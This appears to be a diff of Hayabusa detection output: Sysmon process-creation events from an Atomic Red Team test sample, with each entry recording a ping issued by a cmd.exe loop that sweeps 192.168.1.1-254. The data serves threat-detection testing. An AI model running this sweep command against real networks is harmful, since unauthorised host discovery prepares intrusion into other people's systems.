+2019-07-19 23:51:39.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.10 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5852 | PGUID: 747F3D96-D8FB-5D31-0000-001073F63300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:40.027 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.11 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2412 | PGUID: 747F3D96-D8FC-5D31-0000-001070F93300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:40.431 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.12 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D8FC-5D31-0000-00105AFC3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:41.066 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.13 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D8FD-5D31-0000-0010650E3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:41.408 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.14 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D8FD-5D31-0000-00104F113400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:41.894 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.15 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4588 | PGUID: 747F3D96-D8FD-5D31-0000-001039143400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:42.466 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.16 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D8FE-5D31-0000-001023173400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:43.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.17 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-D8FF-5D31-0000-00100E1A3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:43.503 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.18 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D8FF-5D31-0000-0010C5203400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:44.030 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.19 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6084 | PGUID: 747F3D96-D900-5D31-0000-0010B0233400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:44.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.20 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2416 | PGUID: 747F3D96-D900-5D31-0000-00109C263400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:45.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.21 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4104 | PGUID: 747F3D96-D901-5D31-0000-001086293400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:45.501 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.22 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5112 | PGUID: 747F3D96-D901-5D31-0000-0010712C3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:46.007 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.23 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1104 | PGUID: 747F3D96-D902-5D31-0000-00105B2F3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:46.500 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.24 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4700 | PGUID: 747F3D96-D902-5D31-0000-0010B2393400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:47.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.25 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6104 | PGUID: 747F3D96-D903-5D31-0000-00109D3C3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:47.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.26 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3216 | PGUID: 747F3D96-D903-5D31-0000-0010873F3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:48.044 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.27 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1492 | PGUID: 747F3D96-D904-5D31-0000-001084423400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:48.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.28 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1316 | PGUID: 747F3D96-D904-5D31-0000-00106E453400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:49.010 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.29 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5640 | PGUID: 747F3D96-D905-5D31-0000-001058483400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:49.550 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.30 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2928 | PGUID: 747F3D96-D905-5D31-0000-0010554B3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:50.021 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.31 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1952 | PGUID: 747F3D96-D906-5D31-0000-00103F4E3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:50.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.32 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3760 | PGUID: 747F3D96-D906-5D31-0000-001029513400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:51.013 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.33 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1992 | PGUID: 747F3D96-D907-5D31-0000-001013543400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:51.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.34 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4788 | PGUID: 747F3D96-D907-5D31-0000-0010DA5C3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:52.008 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.35 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3212 | PGUID: 747F3D96-D908-5D31-0000-0010C45F3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:52.448 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.36 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2552 | PGUID: 747F3D96-D908-5D31-0000-0010B2623400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:53.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.37 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2932 | PGUID: 747F3D96-D909-5D31-0000-00109E653400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:53.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.38 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6616 | PGUID: 747F3D96-D909-5D31-0000-001088683400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:54.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.39 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4312 | PGUID: 747F3D96-D90A-5D31-0000-0010726B3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:54.581 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.40 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3684 | PGUID: 747F3D96-D90A-5D31-0000-00105C6E3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:55.015 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.41 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 796 | PGUID: 747F3D96-D90B-5D31-0000-001046713400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:55.552 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.42 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D90B-5D31-0000-001031743400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:56.049 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.43 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4660 | PGUID: 747F3D96-D90C-5D31-0000-00102E773400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:56.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.44 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1360 | PGUID: 747F3D96-D90C-5D31-0000-0010F37F3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:57.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.45 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5060 | PGUID: 747F3D96-D90D-5D31-0000-0010DD823400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:57.558 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.46 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4708 | PGUID: 747F3D96-D90D-5D31-0000-0010D6853400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:58.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.47 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4624 | PGUID: 747F3D96-D90E-5D31-0000-0010D4883400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:58.457 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.48 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7032 | PGUID: 747F3D96-D90E-5D31-0000-0010C18B3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:59.001 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.49 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3560 | PGUID: 747F3D96-D90E-5D31-0000-0010B58E3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:51:59.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.50 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5224 | PGUID: 747F3D96-D90F-5D31-0000-00109F913400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:00.063 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.51 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4380 | PGUID: 747F3D96-D910-5D31-0000-001050953400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:00.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.52 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4544 | PGUID: 747F3D96-D910-5D31-0000-00108F983400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:00.940 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.53 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4260 | PGUID: 747F3D96-D910-5D31-0000-0010BFA43400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:01.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.54 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3872 | PGUID: 747F3D96-D911-5D31-0000-001087AD3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:02.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.55 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1256 | PGUID: 747F3D96-D912-5D31-0000-001072B03400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
